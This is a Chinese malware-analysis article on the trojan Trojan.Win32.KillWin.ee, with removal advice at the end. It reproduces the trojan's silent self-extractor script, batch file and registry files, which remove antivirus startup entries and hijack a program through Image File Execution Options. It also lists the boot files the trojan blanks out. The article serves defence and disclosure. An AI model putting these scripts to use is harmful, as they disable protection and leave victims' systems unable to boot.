对清除Trojan.Win32.KillWin.ee病毒的方案分析

安全
下面的文章主要介绍的是正确清除Trojan.Win32.KillWin.ee病毒的方案的详细解析,以下就是文章的主要内容的详细描述。

以下的文章主要向大家讲述的是正确清除Trojan.Win32.KillWin.ee病毒的方案分析,现在病毒的发展速度已是越来越快,越来越多的伪装及新型变种是一天接一天的疯狂,面对如此情况,很多网民是只能一次又一次的进行系统还原或者是重装系统。

而安全软件在此时却显得力不从心,因为很多病毒木马在发作前都开始解除安软的保护功能,这不新出现的Trojan.Win32.KillWin.ee也具备此种功能。

病毒日新月异的今天,越来越多的伪装及新型变种是一天接一天的疯狂,面对如此情况,很多网民是只能一次又一次的进行系统还原或者是重装系统。而安全软件在此时却显得力不从心,因为很多病毒木马在发作前都开始解除安软的保护功能,这不新出现的Trojan.Win32.KillWin.ee也具备此种功能。

 

病毒分析

该病毒名为Trojan.Win32.KillWin.ee,文件虽然只有小小的169 KB(173,614 字节),但其威力却不容小视。病毒为WINRAR自解压缩包格式,可通过修改自身图标为卡卡助手的标识来进行伪装自身。

当Trojan.Win32.KillWin.ee病毒进驻到用户计算机后,会释放BAT和REG命令的执行文件,并利用命令方式删除用户计算机中的卡卡助手启动项,禁止其真实的程序启动,然后通过劫持卡卡的主程序并将其指向病毒主体gameover.exe程序。

该程序在使用自动解压缩命令解压自身后开始进行系统破坏,其自解压命令如下:

Path=%SystemRoot%\system32\

SavePath

Setup=hidecmd.exe kv.bat

Silent=1

Overwrite=1

执行hidecmd.exe(隐藏执行BAT)用参数调用kv.bat隐藏执行。

kv.bat的内容为:

@echo off

%SystemRoot%\regedit /s kaka.reg

%SystemRoot%\regedit /s gameover.reg

Exit

病毒修改注册表

在结束上述命令后,Trojan.Win32.KillWin.ee病毒源体开始接着导入到系统中两个REG文件,来修改注册表,其内容如下:

kaka.reg:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

"KKDelay"="C:\\Program Files\\Rising\\AntiSpyware\\RunOnce.exe"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"runeip"="\"C:\\Program Files\\Rising\\AntiSpyware\\runiep.exe\" /startup"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]

"Installed"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]

"Installed"="1"

"NoChange"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]

"Installed"="1"

病毒删除卡卡助手#p#

到此时病毒依然没有停手,其开始查找并删除卡卡助手的相关启动,其内容如下:

gameover.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe]

"Debugger"="C:\\winnt\\system32\\gameover.exe"

从而进行劫持卡卡主程序并将其指向释放的病毒。

小提示:从这里%SystemRoot%\system32\可以看出作者针对的是WIN2K系列,因为刚才的WINRAR释放脚本使用的是环境变量,只有在WIN2K系列操作平台中才是WINNT文件夹,而在XP里是WINDOWS\system32\,所以这个劫持指向无效。

重要注释

%System32%是一个可变路径,Trojan.Win32.KillWin.ee病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。

%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量

%Windir%\ WINDODWS所在目录

%DriveLetter%\ 逻辑驱动器根目录

%ProgramFiles%\ 系统程序默认安装目录

%HomeDrive% = C:\ 当前启动的系统的所在分区

%Documents and Settings%\ 当前用户文档根目录

破坏系统的gameover.exe

Trojan.Win32.KillWin.ee病毒在对卡卡劫持后,开始进行下一步活动,在系统中放入gameover.exe程序进行系统破坏。其实gameover.exe也是一个自解压缩包,内含自解压脚本命令如下:

Path=C:\

SavePath

Silent=1

Overwrite=1

释放了0字节的同名空文件替换以下系统文件,破坏系统启动:

AUTOEXEC.BAT

boot.ini

bootfont.bin

CONFIG.SYS

IO.SYS

MSDOS.SYS

NTDETECT.COM

Ntldr

清除病毒

普通用户可通过系统镜像还原实现系统恢复,而对于有一定基础的网民来说,可以系统光盘中复制上述的系统文件进行修复操作系统平台。在查找文件时可以用DIR命令来查找其相关位置,如:首先进入光盘的盘符,然后输入:DIR Autoexe.bat,系统会将此路径下的Autoexe.bat文件的位置显示出来,然后再进行复制文件,其命令格式如下:

COPY_源路径_目标路径(其中_为空格),比如:“COPY_X:\autoexe.bat_C:\”就表示将X盘根目录下的Autoexe.bat文件拷贝到C盘根目录下。

然后删除系统目录%SystemRoot%\system32\下的gameover.exe文件即可,最后进行杀毒软件的升级与全盘杀毒,以防另类感染。

编者按:Trojan.Win32.KillWin.ee病毒虽然有其入驻破坏之道,但只要掌握其原理,在了解其运行过程与所添加的注册表项目后,即可轻而易举的将其清除出系统之外,还平台一个安全的环境。

 

责任编辑:佚名 来源: 安全中国网
相关推荐

2010-09-14 09:16:44

2010-09-13 16:27:28

2010-09-10 10:22:22

Trojan.DL.S

2010-10-09 17:11:16

病毒分析

2015-06-19 14:29:32

2010-09-10 15:06:27

病毒进程

2014-02-19 17:29:14

2013-06-19 11:22:24

下载器木马Trojan.Win3卡巴斯基

2013-09-03 11:03:41

2014-05-09 16:04:41

木马

2014-08-27 17:20:24

2014-06-19 15:44:31

2009-04-17 08:17:13

2018-08-20 13:24:00

安全狗

2010-09-07 21:25:22

2011-03-18 09:40:50

2021-11-07 07:46:29

源码漏洞恶意代码

2012-12-13 13:32:10

2014-02-27 15:45:34

木马下载器木马卡巴斯基

2011-03-31 11:03:15

点赞
收藏

51CTO技术栈公众号